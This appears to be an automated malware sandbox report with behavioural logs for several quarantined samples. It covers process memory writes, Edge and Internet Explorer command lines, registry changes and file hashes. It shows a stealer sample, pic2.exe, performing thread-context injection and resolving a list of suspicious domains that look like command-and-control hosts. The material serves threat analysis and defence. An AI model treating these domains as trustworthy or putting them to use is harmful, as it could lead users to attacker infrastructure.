PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd985346f8,0x7ffd98534708,0x7ffd98534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4876 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f09c5037ff47e75546f2997642cac037
SHA1 63d599921be61b598ef4605a837bb8422222bef2
SHA256 ba61197fff5ed487084790b869045ab41830bdf6db815503e8e064dd4e4df662
SHA512 280bff6eac4b2b4fe515696223f61531f6b507c4c863ad9eef5ab0b1d65d264eba74fb7c9314b6920922142b8ab7605792211fca11a9a9ef0fc2ae995bf4f473

\??\pipe\LOCAL\crashpad_1504_NNNDQSGJZIQSJAAJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 010f6dd77f14afcb78185650052a120d
SHA1 76139f0141fa930b6460f3ca6f00671b4627dc98
SHA256 80321891fd7f7c02dd4be4e5be09f8e57d49e076c750f8deb300be8f600de2d7
SHA512 6e6c9e348e948b946cfb97478698423e1272c4417bc8540e5daa64858e28be8fda5baf28538aee849f8bb409c17a51c60e48a3f1793e3a86cb27edeb32aa30a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2444713ce9e55432d358acd098ea1367
SHA1 2d1d72902abe6ec150f6da268be5da1e4eea5f53
SHA256 0d25c3989aebcf3f2a450d4130bb82de30f33a70ec701a73acd1a2dc0f29aeb4
SHA512 9570d417c1ed1abb0a64a2d9baf5de9d3476751164545c99fc5b015d9f3a4587ad0deb695f2a878f2a3828a9e771ba0046adfdfebcf6fd1b41d9b929f649f403

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c777d29c2749c7a90bee089df5877101
SHA1 a1511be74dd4993a392c43fb4bd6d22bf0fcc5e3
SHA256 0fc68a3ebe4c28025331020f65b9f3270b613b5bb944e85e9fd266d4fe688ed5
SHA512 5b9c66f4f568351a1d46c87e878571c10ab1cc8a8f4f636193fd5763065a3f4a44cb9386f4a574c82876696dcea6b7541857a31033c612241be07319290d15a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f72ea2099c5ad6b0fdbfbe36cad94204
SHA1 0d1c2b1003e7e0deb99ec836c506ae2395e08348
SHA256 92c71a5845dfe39820afd4a69b32a3ff9b8720640d67232e6649abdfd389ac01
SHA512 522fc5a10b8a363962175ee68d94dd5ed4679d49f3926d711d0f1e7e913c0f1d0536a0db4902279c7325e729d3e084e4445e88ece6ec1c08191ede840f8606ed

Analysis: behavioral23

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

94s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4456 set thread context of 512 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4456 -ip 4456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 788

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4456-0-0x0000000074E6E000-0x0000000074E6F000-memory.dmp

memory/4456-1-0x0000000000190000-0x00000000001EA000-memory.dmp

memory/4456-2-0x0000000005190000-0x0000000005734000-memory.dmp

memory/512-4-0x0000000000400000-0x000000000045D000-memory.dmp

memory/512-6-0x0000000000400000-0x000000000045D000-memory.dmp

memory/512-8-0x0000000000400000-0x000000000045D000-memory.dmp

memory/4456-7-0x0000000074E60000-0x0000000075610000-memory.dmp

memory/512-9-0x0000000000400000-0x000000000045D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

N/A

Files

memory/2484-0-0x000000013F020000-0x000000013F1CE000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

136s

Max time network

136s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D843E861-F49B-11EF-BD8C-6252F262FB8A} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d1363a07505a3e43b8c14d85afab89fd000000000200000000001066000000010000200000004ee2e555efa768e24fd6d6b9fd8e1f80127b6c7869fe1cd11712c78548ed4129000000000e80000000020000200000008fa8202c514e6f8584c6cea3262306879e1c7474038a7f3898b036f5eb382dca9000000038a2f0fba8f751dcaba81abaac6dc527a44f19e30783e33e411ccd18ef85de5432e1e5cc97e5543679ded3ee66ac8a23f33ac39b36dd1a8ed0e86dd1f7c4d6c7b6c2fe01d3d6fda3913c84f7b786e32aa9153bfe68e6c5de791b33ea4ab84d42ae5960b16451b81670bc0186a470be35593b099301a7d6d5e06d9aa034fee3ce27f56a35e064bb8ab1c6a79c9722feb840000000c2dc4a999641eeef86f9d0f6c5a4cb196dfb8460eff53e58a5e0e73a1d89aa4153d65c962bdb2bf6c5ff3dab76be5faf07445f593eab60f85c3603389e8dfd06 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d1363a07505a3e43b8c14d85afab89fd0000000002000000000010660000000100002000000005b633f615a6f11ba754292ed7a69a2463e067b453ca2b00b44f5377d997435f000000000e8000000002000020000000eb1e02e210a3633cc8b088a6dcac7ed8c8fefdd223b499bb0a2129fc40d82ef320000000aaeaed1fc891ae768606ae700cec1a8b3afd1f47eb0d89828456fcb04588b0b740000000b961e757cc66c50a873de34c2610a8f6b69bf59899ae24ef0a13c7fa692dd591d3f56eb2e9339baa378fa06aa81260c9fb0dc5a9276b1ca83d9310f6967d7146 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
